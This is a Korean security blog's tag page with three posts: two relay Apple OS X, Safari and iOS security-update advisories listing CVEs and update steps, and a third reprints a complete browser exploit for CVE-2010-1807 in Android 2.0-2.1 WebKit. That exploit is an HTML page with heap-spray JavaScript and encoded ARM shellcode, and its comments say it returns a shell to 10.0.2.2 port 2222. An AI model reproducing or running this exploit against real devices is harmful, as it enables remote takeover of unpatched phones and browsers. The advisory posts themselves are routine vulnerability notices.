'Webkit' 태그의 글 목록

2016. 9. 7. 06:30

Apple(OS X Yosemite, OS X El Capitan, Safari) 보안 업데이트

2016. 9. 7. 06:30 in 스마트폰 (Smart)

			트윗하기

□ 개요
o Apple 社는 자사 제품에서 발견된 임의코드 실행 및 원격제어 가능 취약점을 해결한 보안 업데이트를 발표[1]
o 공격자가 취약점을 이용하여 피해를 발생시킬 수 있어 해당 Apple 제품들을 사용하는 이용자들은 최신버전으로 업데이트 권고

□ 내용
o OS X의 Kernel에서 발생하는 메모리 손상 취약점(CVE-2016-4655)
o OS X의 Kernel에서 발생하는 권한 상승 취약점(CVE-2016-4656)
o Safari의 Webkit에서 발생하는 임의 코드 실행 취약점 (CVE-2016-4657)

□ 대상 시스템
o OS X
- OS X Yosemite 10.10.5 미만 버전 [1]
- OS X EI Capitan 10.11.6 미만 버전 [1]
o Safari
- Safari 9.1.3 미만 버전 [2]

□ 해결 방안
o OS X Yosemite 사용자 – 10.10.5 버전으로 업데이트
o OS X EI Capitan 사용자 – 10.11.6 버전으로 업데이트
o Safari 사용자 – 9.1.3 버전으로 업데이트
- 홈페이지 직접 설치 : http://support.apple.com/downloads/ 링크에서 해당 버전을 다운로드하여 업데이트 진행
- 맥 앱스토어 이용 : 애플 메뉴에서 [소프트웨어 업데이트] 선택

□ 기타 문의사항
o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118

[참고사이트]
[1] https://support.apple.com/en-us/HT207130
[2] https://support.apple.com/en-us/HT207131

저작자표시비영리변경금지

Posted by 날으는물고기

Apple, hi.pe.kr, Kernal, OS X, Safari, Webkit, 권한상승, 메모리손상, 물고기, 보안업데이트, 스마트폰, 임의코드실행, 취약점

Trackback 1 Comment 0

2016. 1. 21. 19:12

Apple(iOS) 보안 업데이트

2016. 1. 21. 19:12 in 스마트폰 (Smart)

			트윗하기

□ 개요
o Apple社에서 자사 제품에 대해 다수의 취약점을 해결한 보안업데이트를 공지

o 공격자가 취약점을 이용하여 피해를 발생시킬 수 있어 해당 Apple 제품을 사용하는 이용자들은 최신버전으로 업데이트 권고

o 커널 권한으로 임의 코드 실행을 할 수 있는 등의 취약점 등
- iOS의 Disk images에서 발생하는 메모리 손상 취약점(CVE-2016-1717)
- iOS의 IOHIDFamily에서 발생하는 메모리 손상 취약점(CVE-2016-1719)
- iOS의 IOKit에서 발생하는 메모리 손상 취약점(CVE-2016-1720)
- iOS의 Kernel에서 발생하는 메모리 손상 취약점(CVE-2016-1721)
- iOS의 libxslt에서 발생하는 타입 컨퓨젼 취약점(CVE-2015-7995)
- iOS의 syslog에서 발생하는 메모리 손상 취약점(CVE-2016-1722)
- iOS의 Webkit에서 발생되는 다중 메모리 손상 취약점(CVE-2016-1723~1727)
- iOS의 Webkit CSS에서 발생하는 정보유출 취약점(CVE-2016-1728)
- iOS의 WebSheet에서 발생하는 정보유출 취약점(CVE-2016-1730)

□ 해당 시스템

o iOS

- iOS 9.2.1 미만 버전[1]

□ 해결 방안

o iOS 사용자 - 최신 9.2.1 버전으로 업데이트

- [설정]→[일반]→[소프트웨어업데이트] 선택→[다운로드 및 설치]→[동의] 선택하여 업데이트

□ 기타 문의사항

o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118

[참고사이트]

[1] https://support.apple.com/en-us/HT205732

저작자표시비영리변경금지

Posted by 날으는물고기

Apple, hi.pe.kr, ios, Webkit, 물고기, 보안업데이트, 스마트폰, 취약점

Trackback 0 Comment 0

2010. 11. 8. 19:01

Android 2.0-2.1 WebKit 원격코드실행 취약점

2010. 11. 8. 19:01 in 스마트폰 (Smart)

			트윗하기

Webkit Floating Point Datatype Remote Code Execution Vulnerability


<html>
<head>
<script>
// bug   =  webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//           listed as a safari bug but also works on android :)
//tested =  moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1
//patched=  android 2.2
//author =   mj
// hardcoded to return a shell to 10.0.2.2 port 2222
//
function sploit(pop)
        {
        var span = document.createElement("div");
        document.getElementById("pwn").appendChild(span);
        span.innerHTML = pop;
        }
function heap()
        {      
        var scode = 
unescape("\u3c84\u0057\u3c80\u0057\u3c7c\u0057\u3c78\u0057\u3c74\u0057\u3c70\u0057\u3c6c\u0057\u3c68\u0057\u3c64\u0057\u3c60\u0057\u3c5c\u0057\u3c58\u0057\u3c54\u0057\u3c50\u0057\u3c4c\u0057\u3c48\u0057\u3c44\u0057\u3c40\u0057\u3c3c\u0057\u3c38\u0057\u3c34\u0057\u3c30\u0057\u3c2c\u0057\u3c28\u0057\u3c24\u0057\u3c20\u0057\u3c1c\u0057\u3c18\u0057\u3c14\u0057\u3c10\u0057\u3c0c\u0057\u3c08\u0057\u3c04\u0057\u3bfc\u0057\u3bfc\u0057\u3bf8\u0057\u3bf4\u0057\u3bf0\u0057\u3bec\u0057\u3be8\u0057\u3be4\u0057\u3be0\u0057\u3bdc\u0057\u3bd8\u0057\u3bd4\u0057\u3bd0\u0057\u3bcc\u0057\u3bc8\u0057\u3bc4\u0057\u3bc0\u0057\u3bbc\u0057\u3bb8\u0057\u3bb4\u0057\u3bb0\u0057\u3bac\u0057\u3ba8\u0057\u3ba4\u0057\u3ba0\u0057\u3b9c\u0057\u3b98\u0057\u3b94\u0057\u3b90\u0057\u3b8c\u0057\u3b88\u0057\u3b84\u0057\u3b80\u0057\u3b7c\u0057\u3b78\u0057\u3b74\u0057\u3b70\u0057\u3b6c\u0057\u3b68\u0057\u3b64\u0057\u3b60\u0057\u3b5c\u0057\u3b58\u0057\u3b54\u0057\u3b50\u0057\u3b4c\u0057\u3b48\u0057\u3b44\u0057\u3b40\u0057\u3b3c\u0057\u3b38\u0057\u3b34\u0057\u3b30\u0057\u3b2c\u0057\u3b28\u0057\u3b24\u0057\u3b20\u0057\u3b1c\u0057\u3b18\u0057\u3b14\u0057\u3b10\u0057\u3b0c\u0057\u3b08\u0057\u3b04\u0057\u3afc\u0057\u3afc\u0057\u3af8\u0057\u3af4\u0057\u3af0\u0057\u3aec\u0057\u3ae8\u0057\u3ae4\u0057\u3ae0\u0057\u3adc\u0057\u3ad8\u0057\u3ad4\u0057\u3ad0\u0057\u3acc\u0057\u3ac8\u0057\u3ac4\u0057\u3ac0\u0057\u3abc\u0057\u3ab8\u0057\u3ab4\u0057\u3ab0\u0057\u3aac\u0057\u3aa8\u0057\u3aa4\u0057\u3aa0\u0057\u3a9c\u0057\u3a98\u0057\u3a94\u0057\u3a90\u0057\u3a8c\u0057\u3a88\u0057\u3a84\u0057\u3a80\u0057\u3a7c\u0057\u3a78\u0057\u3a74\u0057\u3a70\u0057\u3a6c\u0057\u3a68\u0057\u3a64\u0057\u3a60\u0057\u3a5c\u0057\u3a58\u0057\u3a54\u0057\u3a50\u0057\u3a4c\u0057\u3a48\u0057\u3a44\u0057\u3a40\u0057\u3a3c\u0057\u3a38\u0057\u3a34\u0057\u3a30\u0057\u3a2c\u0057\u3a28\u0057\u3a24\u0057\u3a20\u0057\u3a1c\u0057\u3a18\u0057\u3a14\u0057\u3a10\u0057\u3a0c\u0057\u3a08\u0057\u3a04\u0057\u39fc\u0057\u39fc\u0057\u39f8\u0057\u39f4\u0057\u39f0\u0057\u39ec\u0057\u39e8\u0057\u39e4\u0057\u39e0\u0057\u39dc\u0057\u39d8\u0057\u39d4\u0057\u39d0\u0057\u39cc\u0057\u39c8\u0057\u39c4\u0057\u39c0\u0057\u39bc\u0057\u39b8\u0057\u39b4\u0057\u39b0\u0057\u39ac\u0057\u39a8\u0057\u39a4\u0057\u39a0\u0057\u399c\u0057\u3998\u0057\u3994\u0057\u3990\u0057\u398c\u0057\u3988\u0057\u3984\u0057\u3980\u0057\u397c\u0057\u3978\u0057\u3974\u0057\u3970\u0057\u396c\u0057\u3968\u0057\u3964\u0057\u3960\u0057\u395c\u0057\u3958\u0057\u3954\u0057\u3950\u0057\u394c\u0057\u3948\u0057\u3944\u0057\u3940\u0057\u393c\u0057\u3938\u0057\u3934\u0057\u3930\u0057\u392c\u0057\u3928\u0057\u3924\u0057\u3920\u0057\u391c\u0057\u3918\u0057\u3914\u0057\u3910\u0057\u390c\u0057\u3908\u0057\u3904\u0057\u38fc\u0057\u38fc\u0057\u38f8\u0057\u38f4\u0057\u38f0\u0057\u38ec\u0057\u38e8\u0057\u38e4\u0057\u38e0\u0057\u38dc\u0057\u38d8\u0057\u38d4\u0057\u38d0\u0057\u38cc\u0057\u38c8\u0057\u38c4\u0057\u38c0\u0057\u38bc\u0057\u38b8\u0057\u38b4\u0057\u38b0\u0057\u38ac\u0057\u38a8\u0057\u38a4\u0057\u38a0\u0057\u389c\u0057\u3898\u0057\u3894\u0057\u3890\u0057\u388c\u0057\u3888\u0057\u3884\u0057\u3880\u0057\u387c\u0057\u3878\u0057\u3874\u0057\u3870\u0057\u386c\u0057\u3868\u0057\u3864\u0057\u3860\u0057\u385c\u0057\u3858\u0057\u3854\u0057\u3850\u0057\u384c\u0057\u3848\u0057\u3844\u0057\u3840\u0057\u383c\u0057\u3838\u0057\u3834\u0057\u3830\u0057\u382c\u0057\u3828\u0057\u3824\u0057\u3820\u0057\u381c\u0057\u3818\u0057\u3814\u0057\u3810\u0057\u380c\u0057\u3808\u0057\u3804\u0057\u37fc\u0057\u37fc\u0057\u37f8\u0057\u37f4\u0057\u37f0\u0057\u37ec\u0057\u37e8\u0057\u37e4\u0057\u37e0\u0057\u37dc\u0057\u37d8\u0057\u37d4\u0057\u37d0\u0057\u37cc\u0057\u37c8\u0057\u37c4\u0057\u37c0\u0057\u37bc\u0057\u37b8\u0057\u37b4\u0057\u37b0\u0057\u37ac\u0057\u37a8\u0057\u37a4\u0057\u37a0\u0057\u379c\u0057\u3798\u0057\u3794\u0057\u3790\u0057\u378c\u0057\u3788\u0057\u3784\u0057\u3780\u0057\u377c\u0057\u3778\u0057\u3774\u0057\u3770\u0057\u376c\u0057\u3768\u0057\u3764\u0057\u3760\u0057\u375c\u0057\u3758\u0057\u3754\u0057\u3750\u0057\u374c\u0057\u3748\u0057\u3744\u0057\u3740\u0057\u373c\u0057\u3738\u0057\u3734\u0057\u3730\u0057\u372c\u0057\u3728\u0057\u3724\u0057\u3720\u0057\u371c\u0057\u3718\u0057\u3714\u0057\u3710\u0057\u370c\u0057\u3708\u0057\u3704\u0057\u36fc\u0057\u36fc\u0057\u36f8\u0057\u36f4\u0057\u36f0\u0057\u36ec\u0057\u36e8\u0057\u36e4\u0057\u36e0\u0057\u36dc\u0057\u36d8\u0057\u36d4\u0057\u36d0\u0057\u36cc\u0057\u36c8\u0057\u36c4\u0057\u36c0\u0057\u36bc\u0057\u36b8\u0057\u36b4\u0057\u36b0\u0057\u36ac\u0057\u36a8\u0057\u36a4\u0057\u36a0\u0057\u369c\u0057\u3698\u0057\u3694\u0057\u3690\u0057\u368c\u0057\u3688\u0057\u3684\u0057\u3680\u0057\u367c\u0057\u3678\u0057\u3674\u0057\u3670\u0057\u366c\u0057\u3668\u0057\u3664\u0057\u3660\u0057\u365c\u0057\u3658\u0057\u3654\u0057\u3650\u0057\u364c\u0057\u3648\u0057\u3644\u0057\u3640\u0057\u363c\u0057\u3638\u0057\u3634\u0057\u3630\u0057\u362c\u0057\u3628\u0057\u3624\u0057\u3620\u0057\u361c\u0057\u3618\u0057\u3614\u0057\u3610\u0057\u360c\u0057\u3608\u0057\u3604\u0057\u35fc\u0057\u35fc\u0057\u35f8\u0057\u35f4\u0057\u35f0\u0057\u35ec\u0057\u35e8\u0057\u35e4\u0057\u35e0\u0057\u35dc\u0057\u35d8\u0057\u35d4\u0057\u35d0\u0057\u35cc\u0057\u35c8\u0057\u35c4\u0057\u35c0\u0057\u35bc\u0057\u35b8\u0057\u35b4\u0057\u35b0\u0057\u35ac\u0057\u35a8\u0057\u35a4\u0057\u35a0\u0057\u359c\u0057\u3598\u0057\u3594\u0057\u3590\u0057\u358c\u0057\u3588\u0057\u3584\u0057\u3580\u0057\u357c\u0057\u3578\u0057\u3574\u0057\u3570\u0057\u356c\u0057\u3568\u0057\u3564\u0057\u3560\u0057\u355c\u0057\u3558\u0057\u3554\u0057\u3550\u0057\u354c\u0057\u3548\u0057\u3544\u0057\u3540\u0057\u353c\u0057\u3538\u0057\u3534\u0057\u3530\u0057\u352c\u0057\u3528\u0057\u3524\u0057\u3520\u0057\u351c\u0057\u3518\u0057\u3514\u0057\u3510\u0057\u350c\u0057\u3508\u0057\u3504\u0057\u34fc\u0057\u34fc\u0057\u34f8\u0057\u34f4\u0057\u34f0\u0057\u34ec\u0057\u34e8\u0057\u34e4\u0057\u34e0\u0057\u34dc\u0057\u34d8\u0057\u34d4\u0057\u34d0\u0057\u34cc\u0057\u34c8\u0057\u34c4\u0057\u34c0\u0057\u34bc\u0057\u34b8\u0057\u34b4\u0057\u34b0\u0057\u34ac\u0057\u34a8\u0057\u34a4\u0057\u34a0\u0057\u349c\u0057\u3498\u0057\u3494\u0057\u3490\u0057\u348c\u0057\u3488\u0057\u3484\u0057\u3480\u0057\u347c\u0057\u3478\u0057\u3474\u0057\u3470\u0057\u346c\u0057\u3468\u0057\u3464\u0057\u3460\u0057\u345c\u0057\u3458\u0057\u3454\u0057\u3450\u0057\u344c\u0057\u3448\u0057\u3444\u0057\u3440\u0057\u343c\u0057\u3438\u0057\u3434\u0057\u3430\u0057\u342c\u0057\u3428\u0057\u3424\u0057\u3420\u0057\u341c\u0057\u3418\u0057\u3414\u0057\u3410\u0057\u340c\u0057\u3408\u0057\u3404\u0057\u33fc\u0057\u33fc\u0057\u33f8\u0057\u33f4\u0057\u33f0\u0057\u33ec\u0057\u33e8\u0057\u33e4\u0057\u33e0\u0057\u33dc\u0057\u33d8\u0057\u33d4\u0057\u33d0\u0057\u33cc\u0057\u33c8\u0057\u33c4\u0057\u33c0\u0057\u33bc\u0057\u33b8\u0057\u33b4\u0057\u33b0\u0057\u33ac\u0057\u33a8\u0057\u33a4\u0057\u33a0\u0057\u339c\u0057\u3398\u0057\u3394\u0057\u3390\u0057\u338c\u0057\u3388\u0057\u3384\u0057\u3380\u0057\u337c\u0057\u3378\u0057\u3374\u0057\u3370\u0057\u336c\u0057\u3368\u0057\u3364\u0057\u3360\u0057\u335c\u0057\u3358\u0057\u3354\u0057\u3350\u0057\u334c\u0057\u3348\u0057\u3344\u0057\u3340\u0057\u333c\u0057\u3338\u0057\u3334\u0057\u3330\u0057\u332c\u0057\u3328\u0057\u3324\u0057\u3320\u0057\u331c\u0057\u3318\u0057\u3314\u0057\u3310\u0057\u330c\u0057\u3308\u0057\u3304\u0057\u32fc\u0057\u32fc\u0057\u32f8\u0057\u32f4\u0057\u32f0\u0057\u32ec\u0057\u32e8\u0057\u32e4\u0057\u32e0\u0057\u32dc\u0057\u32d8\u0057\u32d4\u0057\u32d0\u0057\u32cc\u0057\u32c8\u0057\u32c4\u0057\u32c0\u0057\u32bc\u0057\u32b8\u0057\u32b4\u0057\u32b0\u0057\u32ac\u0057\u32a8\u0057\u32a4\u0057\u32a0\u0057\u329c\u0057\u3298\u0057\u3294\u0057\u3290\u0057\u328c\u0057\u3288\u0057\u3284\u0057\u3280\u0057\u327c\u0057\u3278\u0057\u3274\u0057\u3270\u0057\u326c\u0057\u3268\u0057\u3264\u0057\u3260\u0057\u325c\u0057\u3258\u0057\u3254\u0057\u3250\u0057\u324c\u0057\u3248\u0057\u3244\u0057\u3240\u0057\u323c\u0057\u3238\u0057\u3234\u0057\u3230\u0057\u322c\u0057\u3228\u0057\u3224\u0057\u3220\u0057\u321c\u0057\u3218\u0057\u3214\u0057\u3210\u0057\u320c\u0057\u3208\u0057\u3204\u0057\u31fc\u0057\u31fc\u0057\u31f8\u0057\u31f4\u0057\u31f0\u0057\u31ec\u0057\u31e8\u0057\u31e4\u0057\u31e0\u0057\u31dc\u0057\u31d8\u0057\u31d4\u0057\u31d0\u0057\u31cc\u0057\u31c8\u0057\u31c4\u0057\u31c0\u0057\u31bc\u0057\u31b8\u0057\u31b4\u0057\u31b0\u0057\u31ac\u0057\u31a8\u0057\u31a4\u0057\u31a0\u0057\u319c\u0057\u3198\u0057\u3194\u0057\u3190\u0057\u318c\u0057\u3188\u0057\u3184\u0057\u3180\u0057\u317c\u0057\u3178\u0057\u3174\u0057\u3170\u0057\u316c\u0057\u3168\u0057\u3164\u0057\u3160\u0057\u315c\u0057\u3158\u0057\u3154\u0057\u3150\u0057\u314c\u0057\u3148\u0057\u3144\u0057\u3140\u0057\u313c\u0057\u3138\u0057\u3134\u0057\u3130\u0057\u312c\u0057\u3128\u0057\u3124\u0057\u3120\u0057\u311c\u0057\u3118\u0057\u3114\u0057\u3110\u0057\u310c\u0057\u3108\u0057\u3104\u0057\u30fc\u0057\u30fc\u0057\u30f8\u0057\u30f4\u0057\u30f0\u0057\u30ec\u0057\u30e8\u0057\u30e4\u0057\u30e0\u0057\u30dc\u0057\u30d8\u0057\u30d4\u0057\u30d0\u0057\u30cc\u0057\u30c8\u0057\u30c4\u0057\u30c0\u0057\u30bc\u0057\u30b8\u0057\u30b4\u0057\u30b0\u0057\u30ac\u0057\u30a8\u0057\u30a4\u0057\u30a0\u0057\u309c\u0057\u3098\u0057\u3094\u0057\u3090\u0057\u308c\u0057\u3088\u0057\u3084\u0057\u3080\u0057\u307c\u0057\u3078\u0057\u3074\u0057\u3070\u0057\u306c\u0057\u3068\u0057\u3064\u0057\u3060\u0057\u305c\u0057\u3058\u0057\u3054\u0057\u3050\u0057\u304c\u0057\u3048\u0057\u3044\u0057\u3040\u0057\u303c\u0057\u3038\u0057\u3034\u0057\u3030\u0057\u302c\u0057\u3028\u0057\u3024\u0057\u3020\u0057\u301c\u0057\u3018\u0057\u3014\u0057\u3010\u0057\u300c\u0057\u3008\u0057\u3004\u0057\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002\uae08\u000a\u0202\u2000\u2000")
        do {
          scode += scode;
        } while(scode.length < 0x1000);
        target = new Array();
        for(i = 0; i < 1000; i++)
           target[i] = scode;
        for (i = 0; i <= 1000; i++)
        {
                if (i>999)
        {
        sploit(-parseFloat("NAN(ffffe00572c60)"));
        }
        document.write("The targets!! " + target[i]);
        document.write("<br />");
        }
}
</script>
</head>
<body id="pwn">
woot
<script>
heap();
</script>
</body>
</html>

출처 : http://www.securityfocus.com/